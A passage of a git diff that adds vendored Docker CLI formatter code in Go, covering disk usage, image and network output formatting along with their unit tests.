+	HeaderContext
+	totalSize int64
+	images    []*types.ImageSummary
+}
+
+func (c *diskUsageImagesContext) Type() string {
+	c.AddHeader(typeHeader)
+	return "Images"
+}
+
+func (c *diskUsageImagesContext) TotalCount() string {
+	c.AddHeader(totalHeader)
+	return fmt.Sprintf("%d", len(c.images))
+}
+
+func (c *diskUsageImagesContext) Active() string {
+	c.AddHeader(activeHeader)
+	used := 0
+	for _, i := range c.images {
+		if i.Containers > 0 {
+			used++
+		}
+	}
+
+	return fmt.Sprintf("%d", used)
+}
+
+func (c *diskUsageImagesContext) Size() string {
+	c.AddHeader(sizeHeader)
+	return units.HumanSize(float64(c.totalSize))
+
+}
+
+func (c *diskUsageImagesContext) Reclaimable() string {
+	var used int64
+
+	c.AddHeader(reclaimableHeader)
+	for _, i := range c.images {
+		if i.Containers != 0 {
+			if i.VirtualSize == -1 || i.SharedSize == -1 {
+				continue
+			}
+			used += i.VirtualSize - i.SharedSize
+		}
+	}
+
+	reclaimable := c.totalSize - used
+	if c.totalSize > 0 {
+		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize)
+	}
+	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
+}
+
+type diskUsageContainersContext struct {
+	HeaderContext
+	verbose    bool
+	containers []*types.Container
+}
+
+func (c *diskUsageContainersContext) Type() string {
+	c.AddHeader(typeHeader)
+	return "Containers"
+}
+
+func (c *diskUsageContainersContext) TotalCount() string {
+	c.AddHeader(totalHeader)
+	return fmt.Sprintf("%d", len(c.containers))
+}
+
+func (c *diskUsageContainersContext) isActive(container types.Container) bool {
+	return strings.Contains(container.State, "running") ||
+		strings.Contains(container.State, "paused") ||
+		strings.Contains(container.State, "restarting")
+}
+
+func (c *diskUsageContainersContext) Active() string {
+	c.AddHeader(activeHeader)
+	used := 0
+	for _, container := range c.containers {
+		if c.isActive(*container) {
+			used++
+		}
+	}
+
+	return fmt.Sprintf("%d", used)
+}
+
+func (c *diskUsageContainersContext) Size() string {
+	var size int64
+
+	c.AddHeader(sizeHeader)
+	for _, container := range c.containers {
+		size += container.SizeRw
+	}
+
+	return units.HumanSize(float64(size))
+}
+
+func (c *diskUsageContainersContext) Reclaimable() string {
+	var reclaimable int64
+	var totalSize int64
+
+	c.AddHeader(reclaimableHeader)
+	for _, container := range c.containers {
+		if !c.isActive(*container) {
+			reclaimable += container.SizeRw
+		}
+		totalSize += container.SizeRw
+	}
+
+	if totalSize > 0 {
+		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize)
+	}
+
+	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
+}
+
+type diskUsageVolumesContext struct {
+	HeaderContext
+	verbose bool
+	volumes []*types.Volume
+}
+
+func (c *diskUsageVolumesContext) Type() string {
+	c.AddHeader(typeHeader)
+	return "Local Volumes"
+}
+
+func (c *diskUsageVolumesContext) TotalCount() string {
+	c.AddHeader(totalHeader)
+	return fmt.Sprintf("%d", len(c.volumes))
+}
+
+func (c *diskUsageVolumesContext) Active() string {
+	c.AddHeader(activeHeader)
+
+	used := 0
+	for _, v := range c.volumes {
+		if v.UsageData.RefCount > 0 {
+			used++
+		}
+	}
+
+	return fmt.Sprintf("%d", used)
+}
+
+func (c *diskUsageVolumesContext) Size() string {
+	var size int64
+
+	c.AddHeader(sizeHeader)
+	for _, v := range c.volumes {
+		if v.UsageData.Size != -1 {
+			size += v.UsageData.Size
+		}
+	}
+
+	return units.HumanSize(float64(size))
+}
+
+func (c *diskUsageVolumesContext) Reclaimable() string {
+	var reclaimable int64
+	var totalSize int64
+
+	c.AddHeader(reclaimableHeader)
+	for _, v := range c.volumes {
+		if v.UsageData.Size != -1 {
+			if v.UsageData.RefCount == 0 {
+				reclaimable += v.UsageData.Size
+			}
+			totalSize += v.UsageData.Size
+		}
+	}
+
+	if totalSize > 0 {
+		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize)
+	}
+
+	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go
new file mode 100644
index 0000000000..e859a1ca26
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go
@@ -0,0 +1,123 @@
+package formatter
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"strings"
+	"text/tabwriter"
+	"text/template"
+
+	"github.com/docker/docker/utils/templates"
+)
+
+// Format keys used to specify certain kinds of output formats
+const (
+	TableFormatKey  = "table"
+	RawFormatKey    = "raw"
+	PrettyFormatKey = "pretty"
+
+	defaultQuietFormat = "{{.ID}}"
+)
+
+// Format is the format string rendered using the Context
+type Format string
+
+// IsTable returns true if the format is a table-type format
+func (f Format) IsTable() bool {
+	return strings.HasPrefix(string(f), TableFormatKey)
+}
+
+// Contains returns true if the format contains the substring
+func (f Format) Contains(sub string) bool {
+	return strings.Contains(string(f), sub)
+}
+
+// Context contains information required by the formatter to print the output as desired.
+type Context struct {
+	// Output is the output stream to which the formatted string is written.
+	Output io.Writer
+	// Format is used to choose raw, table or custom format for the output.
+	Format Format
+	// Trunc when set to true will truncate the output of certain fields such as Container ID.
+	Trunc bool
+
+	// internal element
+	finalFormat string
+	header      string
+	buffer      *bytes.Buffer
+}
+
+func (c *Context) preFormat() {
+	c.finalFormat = string(c.Format)
+
+	// TODO: handle this in the Format type
+	if c.Format.IsTable() {
+		c.finalFormat = c.finalFormat[len(TableFormatKey):]
+	}
+
+	c.finalFormat = strings.Trim(c.finalFormat, " ")
+	r := strings.NewReplacer(`\t`, "\t", `\n`, "\n")
+	c.finalFormat = r.Replace(c.finalFormat)
+}
+
+func (c *Context) parseFormat() (*template.Template, error) {
+	tmpl, err := templates.Parse(c.finalFormat)
+	if err != nil {
+		return tmpl, fmt.Errorf("Template parsing error: %v\n", err)
+	}
+	return tmpl, err
+}
+
+func (c *Context) postFormat(tmpl *template.Template, subContext subContext) {
+	if c.Format.IsTable() {
+		if len(c.header) == 0 {
+			// if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template
+			tmpl.Execute(bytes.NewBufferString(""), subContext)
+			c.header = subContext.FullHeader()
+		}
+
+		t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0)
+		t.Write([]byte(c.header))
+		t.Write([]byte("\n"))
+		c.buffer.WriteTo(t)
+		t.Flush()
+	} else {
+		c.buffer.WriteTo(c.Output)
+	}
+}
+
+func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error {
+	if err := tmpl.Execute(c.buffer, subContext); err != nil {
+		return fmt.Errorf("Template parsing error: %v\n", err)
+	}
+	if c.Format.IsTable() && len(c.header) == 0 {
+		c.header = subContext.FullHeader()
+	}
+	c.buffer.WriteString("\n")
+	return nil
+}
+
+// SubFormat is a function type accepted by Write()
+type SubFormat func(func(subContext) error) error
+
+// Write the template to the buffer using this Context
+func (c *Context) Write(sub subContext, f SubFormat) error {
+	c.buffer = bytes.NewBufferString("")
+	c.preFormat()
+
+	tmpl, err := c.parseFormat()
+	if err != nil {
+		return err
+	}
+
+	subFormat := func(subContext subContext) error {
+		return c.contextFormat(tmpl, subContext)
+	}
+	if err := f(subFormat); err != nil {
+		return err
+	}
+
+	c.postFormat(tmpl, sub)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go
new file mode 100644
index 0000000000..5c7de826f0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/image.go
@@ -0,0 +1,259 @@
+package formatter
+
+import (
+	"fmt"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	units "github.com/docker/go-units"
+)
+
+const (
+	defaultImageTableFormat           = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}"
+	defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}"
+
+	imageIDHeader    = "IMAGE ID"
+	repositoryHeader = "REPOSITORY"
+	tagHeader        = "TAG"
+	digestHeader     = "DIGEST"
+)
+
+// ImageContext contains image specific information required by the formater, encapsulate a Context struct.
+type ImageContext struct {
+	Context
+	Digest bool
+}
+
+func isDangling(image types.ImageSummary) bool {
+	return len(image.RepoTags) == 1 && image.RepoTags[0] == "<none>:<none>" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "<none>@<none>"
+}
+
+// NewImageFormat returns a format for rendering an ImageContext
+func NewImageFormat(source string, quiet bool, digest bool) Format {
+	switch source {
+	case TableFormatKey:
+		switch {
+		case quiet:
+			return defaultQuietFormat
+		case digest:
+			return defaultImageTableFormatWithDigest
+		default:
+			return defaultImageTableFormat
+		}
+	case RawFormatKey:
+		switch {
+		case quiet:
+			return `image_id: {{.ID}}`
+		case digest:
+			return `repository: {{ .Repository }}
+tag: {{.Tag}}
+digest: {{.Digest}}
+image_id: {{.ID}}
+created_at: {{.CreatedAt}}
+virtual_size: {{.Size}}
+`
+		default:
+			return `repository: {{ .Repository }}
+tag: {{.Tag}}
+image_id: {{.ID}}
+created_at: {{.CreatedAt}}
+virtual_size: {{.Size}}
+`
+		}
+	}
+
+	format := Format(source)
+	if format.IsTable() && digest && !format.Contains("{{.Digest}}") {
+		format += "\t{{.Digest}}"
+	}
+	return format
+}
+
+// ImageWrite writes the formatter images using the ImageContext
+func ImageWrite(ctx ImageContext, images []types.ImageSummary) error {
+	render := func(format func(subContext subContext) error) error {
+		return imageFormat(ctx, images, format)
+	}
+	return ctx.Write(&imageContext{}, render)
+}
+
+func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error {
+	for _, image := range images {
+		images := []*imageContext{}
+		if isDangling(image) {
+			images = append(images, &imageContext{
+				trunc:  ctx.Trunc,
+				i:      image,
+				repo:   "<none>",
+				tag:    "<none>",
+				digest: "<none>",
+			})
+		} else {
+			repoTags := map[string][]string{}
+			repoDigests := map[string][]string{}
+
+			for _, refString := range append(image.RepoTags) {
+				ref, err := reference.ParseNamed(refString)
+				if err != nil {
+					continue
+				}
+				if nt, ok := ref.(reference.NamedTagged); ok {
+					repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag())
+				}
+			}
+			for _, refString := range append(image.RepoDigests) {
+				ref, err := reference.ParseNamed(refString)
+				if err != nil {
+					continue
+				}
+				if c, ok := ref.(reference.Canonical); ok {
+					repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String())
+				}
+			}
+
+			for repo, tags := range repoTags {
+				digests := repoDigests[repo]
+
+				// Do not display digests as their own row
+				delete(repoDigests, repo)
+
+				if !ctx.Digest {
+					// Ignore digest references, just show tag once
+					digests = nil
+				}
+
+				for _, tag := range tags {
+					if len(digests) == 0 {
+						images = append(images, &imageContext{
+							trunc:  ctx.Trunc,
+							i:      image,
+							repo:   repo,
+							tag:    tag,
+							digest: "<none>",
+						})
+						continue
+					}
+					// Display the digests for each tag
+					for _, dgst := range digests {
+						images = append(images, &imageContext{
+							trunc:  ctx.Trunc,
+							i:      image,
+							repo:   repo,
+							tag:    tag,
+							digest: dgst,
+						})
+					}
+
+				}
+			}
+
+			// Show rows for remaining digest only references
+			for repo, digests := range repoDigests {
+				// If digests are displayed, show row per digest
+				if ctx.Digest {
+					for _, dgst := range digests {
+						images = append(images, &imageContext{
+							trunc:  ctx.Trunc,
+							i:      image,
+							repo:   repo,
+							tag:    "<none>",
+							digest: dgst,
+						})
+					}
+				} else {
+					images = append(images, &imageContext{
+						trunc: ctx.Trunc,
+						i:     image,
+						repo:  repo,
+						tag:   "<none>",
+					})
+				}
+			}
+		}
+		for _, imageCtx := range images {
+			if err := format(imageCtx); err != nil {
+				return err
+			}
+		}
+	}
+	return nil
+}
+
+type imageContext struct {
+	HeaderContext
+	trunc  bool
+	i      types.ImageSummary
+	repo   string
+	tag    string
+	digest string
+}
+
+func (c *imageContext) ID() string {
+	c.AddHeader(imageIDHeader)
+	if c.trunc {
+		return stringid.TruncateID(c.i.ID)
+	}
+	return c.i.ID
+}
+
+func (c *imageContext) Repository() string {
+	c.AddHeader(repositoryHeader)
+	return c.repo
+}
+
+func (c *imageContext) Tag() string {
+	c.AddHeader(tagHeader)
+	return c.tag
+}
+
+func (c *imageContext) Digest() string {
+	c.AddHeader(digestHeader)
+	return c.digest
+}
+
+func (c *imageContext) CreatedSince() string {
+	c.AddHeader(createdSinceHeader)
+	createdAt := time.Unix(int64(c.i.Created), 0)
+	return units.HumanDuration(time.Now().UTC().Sub(createdAt))
+}
+
+func (c *imageContext) CreatedAt() string {
+	c.AddHeader(createdAtHeader)
+	return time.Unix(int64(c.i.Created), 0).String()
+}
+
+func (c *imageContext) Size() string {
+	c.AddHeader(sizeHeader)
+	return units.HumanSizeWithPrecision(float64(c.i.Size), 3)
+}
+
+func (c *imageContext) Containers() string {
+	c.AddHeader(containersHeader)
+	if c.i.Containers == -1 {
+		return "N/A"
+	}
+	return fmt.Sprintf("%d", c.i.Containers)
+}
+
+func (c *imageContext) VirtualSize() string {
+	c.AddHeader(sizeHeader)
+	return units.HumanSize(float64(c.i.VirtualSize))
+}
+
+func (c *imageContext) SharedSize() string {
+	c.AddHeader(sharedSizeHeader)
+	if c.i.SharedSize == -1 {
+		return "N/A"
+	}
+	return units.HumanSize(float64(c.i.SharedSize))
+}
+
+func (c *imageContext) UniqueSize() string {
+	c.AddHeader(uniqueSizeHeader)
+	if c.i.VirtualSize == -1 || c.i.SharedSize == -1 {
+		return "N/A"
+	}
+	return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize))
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go
new file mode 100644
index 0000000000..ffe77f6677
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go
@@ -0,0 +1,333 @@
+package formatter
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestImageContext(t *testing.T) {
+	imageID := stringid.GenerateRandomID()
+	unix := time.Now().Unix()
+
+	var ctx imageContext
+	cases := []struct {
+		imageCtx  imageContext
+		expValue  string
+		expHeader string
+		call      func() string
+	}{
+		{imageContext{
+			i:     types.ImageSummary{ID: imageID},
+			trunc: true,
+		}, stringid.TruncateID(imageID), imageIDHeader, ctx.ID},
+		{imageContext{
+			i:     types.ImageSummary{ID: imageID},
+			trunc: false,
+		}, imageID, imageIDHeader, ctx.ID},
+		{imageContext{
+			i:     types.ImageSummary{Size: 10, VirtualSize: 10},
+			trunc: true,
+		}, "10 B", sizeHeader, ctx.Size},
+		{imageContext{
+			i:     types.ImageSummary{Created: unix},
+			trunc: true,
+		}, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt},
+		// FIXME
+		// {imageContext{
+		// 	i:     types.ImageSummary{Created: unix},
+		// 	trunc: true,
+		// }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince},
+		{imageContext{
+			i:    types.ImageSummary{},
+			repo: "busybox",
+		}, "busybox", repositoryHeader, ctx.Repository},
+		{imageContext{
+			i:   types.ImageSummary{},
+			tag: "latest",
+		}, "latest", tagHeader, ctx.Tag},
+		{imageContext{
+			i:      types.ImageSummary{},
+			digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a",
+		}, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest},
+	}
+
+	for _, c := range cases {
+		ctx = c.imageCtx
+		v := c.call()
+		if strings.Contains(v, ",") {
+			compareMultipleValues(t, v, c.expValue)
+		} else if v != c.expValue {
+			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
+		}
+
+		h := ctx.FullHeader()
+		if h != c.expHeader {
+			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
+		}
+	}
+}
+
+func TestImageContextWrite(t *testing.T) {
+	unixTime := time.Now().AddDate(0, 0, -1).Unix()
+	expectedTime := time.Unix(unixTime, 0).String()
+
+	cases := []struct {
+		context  ImageContext
+		expected string
+	}{
+		// Errors
+		{
+			ImageContext{
+				Context: Context{
+					Format: "{{InvalidFunction}}",
+				},
+			},
+			`Template parsing error: template: :1: function "InvalidFunction" not defined
+`,
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: "{{nil}}",
+				},
+			},
+			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
+`,
+		},
+		// Table Format
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table", false, false),
+				},
+			},
+			`REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+image               tag1                imageID1            24 hours ago        0 B
+image               tag2                imageID2            24 hours ago        0 B
+<none>              <none>              imageID3            24 hours ago        0 B
+`,
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table {{.Repository}}", false, false),
+				},
+			},
+			"REPOSITORY\nimage\nimage\n<none>\n",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table {{.Repository}}", false, true),
+				},
+				Digest: true,
+			},
+			`REPOSITORY          DIGEST
+image               sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
+image               <none>
+<none>              <none>
+`,
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table {{.Repository}}", true, false),
+				},
+			},
+			"REPOSITORY\nimage\nimage\n<none>\n",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table", true, false),
+				},
+			},
+			"imageID1\nimageID2\nimageID3\n",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table", false, true),
+				},
+				Digest: true,
+			},
+			`REPOSITORY          TAG                 DIGEST                                                                    IMAGE ID            CREATED             SIZE
+image               tag1                sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   imageID1            24 hours ago        0 B
+image               tag2                <none>                                                                    imageID2            24 hours ago        0 B
+<none>              <none>              <none>                                                                    imageID3            24 hours ago        0 B
+`,
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table", true, true),
+				},
+				Digest: true,
+			},
+			"imageID1\nimageID2\nimageID3\n",
+		},
+		// Raw Format
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("raw", false, false),
+				},
+			},
+			fmt.Sprintf(`repository: image
+tag: tag1
+image_id: imageID1
+created_at: %s
+virtual_size: 0 B
+
+repository: image
+tag: tag2
+image_id: imageID2
+created_at: %s
+virtual_size: 0 B
+
+repository: <none>
+tag: <none>
+image_id: imageID3
+created_at: %s
+virtual_size: 0 B
+
+`, expectedTime, expectedTime, expectedTime),
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("raw", false, true),
+				},
+				Digest: true,
+			},
+			fmt.Sprintf(`repository: image
+tag: tag1
+digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
+image_id: imageID1
+created_at: %s
+virtual_size: 0 B
+
+repository: image
+tag: tag2
+digest: <none>
+image_id: imageID2
+created_at: %s
+virtual_size: 0 B
+
+repository: <none>
+tag: <none>
+digest: <none>
+image_id: imageID3
+created_at: %s
+virtual_size: 0 B
+
+`, expectedTime, expectedTime, expectedTime),
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("raw", true, false),
+				},
+			},
+			`image_id: imageID1
+image_id: imageID2
+image_id: imageID3
+`,
+		},
+		// Custom Format
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("{{.Repository}}", false, false),
+				},
+			},
+			"image\nimage\n<none>\n",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("{{.Repository}}", false, true),
+				},
+				Digest: true,
+			},
+			"image\nimage\n<none>\n",
+		},
+	}
+
+	for _, testcase := range cases {
+		images := []types.ImageSummary{
+			{ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime},
+			{ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime},
+			{ID: "imageID3", RepoTags: []string{"<none>:<none>"}, RepoDigests: []string{"<none>@<none>"}, Created: unixTime},
+		}
+		out := bytes.NewBufferString("")
+		testcase.context.Output = out
+		err := ImageWrite(testcase.context, images)
+		if err != nil {
+			assert.Error(t, err, testcase.expected)
+		} else {
+			assert.Equal(t, out.String(), testcase.expected)
+		}
+	}
+}
+
+func TestImageContextWriteWithNoImage(t *testing.T) {
+	out := bytes.NewBufferString("")
+	images := []types.ImageSummary{}
+
+	contexts := []struct {
+		context  ImageContext
+		expected string
+	}{
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("{{.Repository}}", false, false),
+					Output: out,
+				},
+			},
+			"",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table {{.Repository}}", false, false),
+					Output: out,
+				},
+			},
+			"REPOSITORY\n",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("{{.Repository}}", false, true),
+					Output: out,
+				},
+			},
+			"",
+		},
+		{
+			ImageContext{
+				Context: Context{
+					Format: NewImageFormat("table {{.Repository}}", false, true),
+					Output: out,
+				},
+			},
+			"REPOSITORY          DIGEST\n",
+		},
+	}
+
+	for _, context := range contexts {
+		ImageWrite(context.context, images)
+		assert.Equal(t, out.String(), context.expected)
+		// Clean buffer
+		out.Reset()
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go
new file mode 100644
index 0000000000..7fbad7d2ab
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/network.go
@@ -0,0 +1,117 @@
+package formatter
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+const (
+	defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}"
+
+	networkIDHeader = "NETWORK ID"
+	ipv6Header      = "IPV6"
+	internalHeader  = "INTERNAL"
+)
+
+// NewNetworkFormat returns a Format for rendering using a network Context
+func NewNetworkFormat(source string, quiet bool) Format {
+	switch source {
+	case TableFormatKey:
+		if quiet {
+			return defaultQuietFormat
+		}
+		return defaultNetworkTableFormat
+	case RawFormatKey:
+		if quiet {
+			return `network_id: {{.ID}}`
+		}
+		return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n`
+	}
+	return Format(source)
+}
+
+// NetworkWrite writes the context
+func NetworkWrite(ctx Context, networks []types.NetworkResource) error {
+	render := func(format func(subContext subContext) error) error {
+		for _, network := range networks {
+			networkCtx := &networkContext{trunc: ctx.Trunc, n: network}
+			if err := format(networkCtx); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+	return ctx.Write(&networkContext{}, render)
+}
+
+type networkContext struct {
+	HeaderContext
+	trunc bool
+	n     types.NetworkResource
+}
+
+func (c *networkContext) MarshalJSON() ([]byte, error) {
+	return marshalJSON(c)
+}
+
+func (c *networkContext) ID() string {
+	c.AddHeader(networkIDHeader)
+	if c.trunc {
+		return stringid.TruncateID(c.n.ID)
+	}
+	return c.n.ID
+}
+
+func (c *networkContext) Name() string {
+	c.AddHeader(nameHeader)
+	return c.n.Name
+}
+
+func (c *networkContext) Driver() string {
+	c.AddHeader(driverHeader)
+	return c.n.Driver
+}
+
+func (c *networkContext) Scope() string {
+	c.AddHeader(scopeHeader)
+	return c.n.Scope
+}
+
+func (c *networkContext) IPv6() string {
+	c.AddHeader(ipv6Header)
+	return fmt.Sprintf("%v", c.n.EnableIPv6)
+}
+
+func (c *networkContext) Internal() string {
+	c.AddHeader(internalHeader)
+	return fmt.Sprintf("%v", c.n.Internal)
+}
+
+func (c *networkContext) Labels() string {
+	c.AddHeader(labelsHeader)
+	if c.n.Labels == nil {
+		return ""
+	}
+
+	var joinLabels []string
+	for k, v := range c.n.Labels {
+		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
+	}
+	return strings.Join(joinLabels, ",")
+}
+
+func (c *networkContext) Label(name string) string {
+	n := strings.Split(name, ".")
+	r := strings.NewReplacer("-", " ", "_", " ")
+	h := r.Replace(n[len(n)-1])
+
+	c.AddHeader(h)
+
+	if c.n.Labels == nil {
+		return ""
+	}
+	return c.n.Labels[name]
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go
new file mode 100644
index 0000000000..b40a534eed
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go
@@ -0,0 +1,208 @@
+package formatter
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestNetworkContext(t *testing.T) {
+	networkID := stringid.GenerateRandomID()
+
+	var ctx networkContext
+	cases := []struct {
+		networkCtx networkContext
+		expValue   string
+		expHeader  string
+		call       func() string
+	}{
+		{networkContext{
+			n:     types.NetworkResource{ID: networkID},
+			trunc: false,
+		}, networkID, networkIDHeader, ctx.ID},
+		{networkContext{
+			n:     types.NetworkResource{ID: networkID},
+			trunc: true,
+		}, stringid.TruncateID(networkID), networkIDHeader, ctx.ID},
+		{networkContext{
+			n: types.NetworkResource{Name: "network_name"},
+		}, "network_name", nameHeader, ctx.Name},
+		{networkContext{
+			n: types.NetworkResource{Driver: "driver_name"},
+		}, "driver_name", driverHeader, ctx.Driver},
+		{networkContext{
+			n: types.NetworkResource{EnableIPv6: true},
+		}, "true", ipv6Header, ctx.IPv6},
+		{networkContext{
+			n: types.NetworkResource{EnableIPv6: false},
+		}, "false", ipv6Header, ctx.IPv6},
+		{networkContext{
+			n: types.NetworkResource{Internal: true},
+		}, "true", internalHeader, ctx.Internal},
+		{networkContext{
+			n: types.NetworkResource{Internal: false},
+		}, "false", internalHeader, ctx.Internal},
+		{networkContext{
+			n: types.NetworkResource{},
+		}, "", labelsHeader, ctx.Labels},
+		{networkContext{
+			n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}},
+		}, "label1=value1,label2=value2", labelsHeader, ctx.Labels},
+	}
+
+	for _, c := range cases {
+		ctx = c.networkCtx
+		v := c.call()
+		if strings.Contains(v, ",") {
+			compareMultipleValues(t, v, c.expValue)
+		} else if v != c.expValue {
+			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
+		}
+
+		h := ctx.FullHeader()
+		if h != c.expHeader {
+			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
+		}
+	}
+}
+
+func TestNetworkContextWrite(t *testing.T) {
+	cases := []struct {
+		context  Context
+		expected string
+	}{
+
+		// Errors
+		{
+			Context{Format: "{{InvalidFunction}}"},
+			`Template parsing error: template: :1: function "InvalidFunction" not defined
+`,
+		},
+		{
+			Context{Format: "{{nil}}"},
+			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
+`,
+		},
+		// Table format
+		{
+			Context{Format: NewNetworkFormat("table", false)},
+			`NETWORK ID          NAME                DRIVER              SCOPE
+networkID1          foobar_baz          foo                 local
+networkID2          foobar_bar          bar                 local
+`,
+		},
+		{
+			Context{Format: NewNetworkFormat("table", true)},
+			`networkID1
+networkID2
+`,
+		},
+		{
+			Context{Format: NewNetworkFormat("table {{.Name}}", false)},
+			`NAME
+foobar_baz
+foobar_bar
+`,
+		},
+		{
+			Context{Format: NewNetworkFormat("table {{.Name}}", true)},
+			`NAME
+foobar_baz
+foobar_bar
+`,
+		},
+		// Raw Format
+		{
+			Context{Format: NewNetworkFormat("raw", false)},
+			`network_id: networkID1
+name: foobar_baz
+driver: foo
+scope: local
+
+network_id: networkID2
+name: foobar_bar
+driver: bar
+scope: local
+
+`,
+		},
+		{
+			Context{Format: NewNetworkFormat("raw", true)},
+			`network_id: networkID1
+network_id: networkID2
+`,
+		},
+		// Custom Format
+		{
+			Context{Format: NewNetworkFormat("{{.Name}}", false)},
+			`foobar_baz
+foobar_bar
+`,
+		},
+	}
+
+	for _, testcase := range cases {
+		networks := []types.NetworkResource{
+			{ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"},
+			{ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"},
+		}
+		out := bytes.NewBufferString("")
+		testcase.context.Output = out
+		err := NetworkWrite(testcase.context, networks)
+		if err != nil {
+			assert.Error(t, err, testcase.expected)
+		} else {
+			assert.Equal(t, out.String(), testcase.expected)
+		}
+	}
+}
+
+func TestNetworkContextWriteJSON(t *testing.T) {
+	networks := []types.NetworkResource{
+		{ID: "networkID1", Name: "foobar_baz"},
+		{ID: "networkID2", Name: "foobar_bar"},
+	}
+	expectedJSONs := []map[string]interface{}{
+		{"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""},
